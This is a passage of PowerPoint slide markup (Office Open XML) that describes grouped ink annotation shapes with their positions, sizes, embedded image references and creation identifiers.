              <a:xfrm>
                <a:off x="3190972" y="2855772"/>
                <a:ext cx="19800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873D3446-5543-9DB5-04B3-894C179FC06C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3399052" y="3061332"/>
              <a:ext cx="164880" cy="277560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="Ink 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{873D3446-5543-9DB5-04B3-894C179FC06C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId22"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3363412" y="3025692"/>
                <a:ext cx="2365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BEB01D4C-CC6B-2D19-3EC7-90B5CFEC4F00}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3657172" y="3063492"/>
              <a:ext cx="39600" cy="146520"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Ink 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB01D4C-CC6B-2D19-3EC7-90B5CFEC4F00}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId24"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3621532" y="3027852"/>
                <a:ext cx="1112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7AD0A067-B529-7C81-09E0-BA8655D3FBC9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1702372" y="1601892"/>
              <a:ext cx="2721600" cy="4486680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="Ink 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD0A067-B529-7C81-09E0-BA8655D3FBC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId26"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1666732" y="1566252"/>
                <a:ext cx="2793240" cy="4558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 name="Ink 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B428B971-3360-F70E-9820-B0888CAE6E96}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7095172" y="5978772"/>
              <a:ext cx="735480" cy="501120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="51" name="Ink 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B428B971-3360-F70E-9820-B0888CAE6E96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId28"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7059172" y="5942772"/>
                <a:ext cx="807120" cy="572760"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64" name="Group 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949C2917-3E8E-E89A-32EA-2339A2B3DCF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7720492" y="5712732"/>
            <a:ext cx="1861560" cy="658080"/>
            <a:chOff x="7720492" y="5712732"/>
            <a:chExt cx="1861560" cy="658080"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId29">
              <p14:nvContentPartPr>
                <p14:cNvPr id="53" name="Ink 52">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5C3AC5-53F6-66BF-69A2-443502C8346F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7720492" y="6127092"/>
                <a:ext cx="120240" cy="243720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="53" name="Ink 52">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5C3AC5-53F6-66BF-69A2-443502C8346F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId30"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7684852" y="6091092"/>
                  <a:ext cx="1918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4" name="Ink 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D92125-A12C-09D1-29EE-CE92A4F3B25A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7900852" y="6041052"/>
                <a:ext cx="285480" cy="244440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="54" name="Ink 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D92125-A12C-09D1-29EE-CE92A4F3B25A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId32"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7865212" y="6005052"/>
                  <a:ext cx="3571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FC328285-7BC1-03A1-5C7C-2F33165289EF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8221252" y="5736492"/>
                <a:ext cx="162720" cy="533880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="55" name="Ink 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC328285-7BC1-03A1-5C7C-2F33165289EF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId34"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8185612" y="5700492"/>
                  <a:ext cx="23436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BE3A7D11-650C-CACC-C935-53DCB9886E34}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8158972" y="5955012"/>
                <a:ext cx="454680" cy="62640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="56" name="Ink 55">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3A7D11-650C-CACC-C935-53DCB9886E34}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId36"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8122972" y="5919012"/>
                  <a:ext cx="5263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C0797A27-0870-0F89-AF48-4969073837C4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8517172" y="5954652"/>
                <a:ext cx="283680" cy="275040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="57" name="Ink 56">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0797A27-0870-0F89-AF48-4969073837C4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId38"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8481172" y="5919012"/>
                  <a:ext cx="3553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95B2C97D-4994-BC5B-84B4-F8418590623F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8846932" y="6033132"/>
                <a:ext cx="14040" cy="47520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="58" name="Ink 57">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B2C97D-4994-BC5B-84B4-F8418590623F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId40"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8810932" y="5997492"/>
                  <a:ext cx="856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9" name="Ink 58">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FE5A2F-34FC-BB39-645E-B81739234C3A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8823172" y="5712732"/>
                <a:ext cx="360" cy="360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="59" name="Ink 58">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FE5A2F-34FC-BB39-645E-B81739234C3A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId42"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8787532" y="567709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k 59">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40631F42-ECAB-43CB-5BF6-6B4DE6883410}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8901652" y="5830092"/>
                <a:ext cx="330120" cy="413280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="60" name="Ink 59">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40631F42-ECAB-43CB-5BF6-6B4DE6883410}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId44"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8865652" y="5794452"/>
                  <a:ext cx="40176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FDB23202-E2BC-805D-E876-29A2A0FA08AC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9245092" y="5782572"/>
                <a:ext cx="176400" cy="458280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="61" name="Ink 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB23202-E2BC-805D-E876-29A2A0FA08AC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId46"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9209452" y="5746572"/>
                  <a:ext cx="24804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DDBDE64E-F397-9727-8F1F-1AD002EA1D07}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9510412" y="5751972"/>
                <a:ext cx="71640" cy="191880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="62" name="Ink 61">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBDE64E-F397-9727-8F1F-1AD002EA1D07}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId48"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9474772" y="5715972"/>
                  <a:ext cx="143280" cy="263520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Group 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B63845-19F3-6190-7ED1-F344FB36C974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4900612" y="6189372"/>
            <a:ext cx="1610640" cy="357840"/>
            <a:chOff x="4900612" y="6189372"/>
            <a:chExt cx="1610640" cy="357840"/>
          </a:xfrm>
        </p:grpSpPr>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E80A1115-3E56-9882-E967-5EC40F080331}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4900612" y="6306732"/>
                <a:ext cx="1484280" cy="140040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="63" name="Ink 62">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80A1115-3E56-9882-E967-5EC40F080331}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId50"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4864972" y="6271092"/>
                  <a:ext cx="15559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5" name="Ink 64">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B57AAC-3FA7-CA30-D585-BCB11E8DEA6B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6158092" y="6189372"/>
                <a:ext cx="353160" cy="357840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="65" name="Ink 64">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B57AAC-3FA7-CA30-D585-BCB11E8DEA6B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId52"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6122452" y="6153732"/>
                  <a:ext cx="424800" cy="429480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="71" name="Group 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554F52FA-C8B3-5C43-12D0-A34C6912578A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2726932" y="6291252"/>
            <a:ext cx="1494360" cy="532440"/>
            <a:chOff x="2726932" y="6291252"/>
            <a:chExt cx="1494360" cy="532440"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId53">
              <p14:nvContentPartPr>
                <p14:cNvPr id="31" name="Ink 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031D927A-71BB-13E4-3783-A99A1853B84D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2726932" y="6291252"/>
                <a:ext cx="440280" cy="470880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="31" name="Ink 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031D927A-71BB-13E4-3783-A99A1853B84D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId54"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2690932" y="6255612"/>
                  <a:ext cx="51192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Ink 31">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15149E86-1633-7F4F-1B84-6CAF0F9A07FF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3235252" y="6470892"/>
                <a:ext cx="270720" cy="266760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="32" name="Ink 31">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15149E86-1633-7F4F-1B84-6CAF0F9A07FF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId56"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3199612" y="6434892"/>
                  <a:ext cx="3423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Ink 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6F41E6-5E02-35E1-5406-86A5795C5D34}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3627292" y="6317892"/>
                <a:ext cx="429120" cy="416160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="33" name="Ink 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6F41E6-5E02-35E1-5406-86A5795C5D34}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId58"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3591652" y="6282252"/>
                  <a:ext cx="5007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032A9DD2-093A-2AD4-8F41-C16210065551}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3797932" y="6455412"/>
                <a:ext cx="180360" cy="360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="34" name="Ink 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032A9DD2-093A-2AD4-8F41-C16210065551}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId60"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3762292" y="6419412"/>
                  <a:ext cx="25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 name="Ink 66">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5E2542-EAA9-5D10-4D64-04192A350FB3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3805852" y="6810732"/>
                <a:ext cx="160560" cy="12960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="67" name="Ink 66">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5E2542-EAA9-5D10-4D64-04192A350FB3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId62"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3769852" y="6774732"/>
                  <a:ext cx="2322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 name="Ink 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C94DD6-FC62-7280-69D2-50B32D2FC15A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3876412" y="6775812"/>
                <a:ext cx="344880" cy="28800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="68" name="Ink 67">
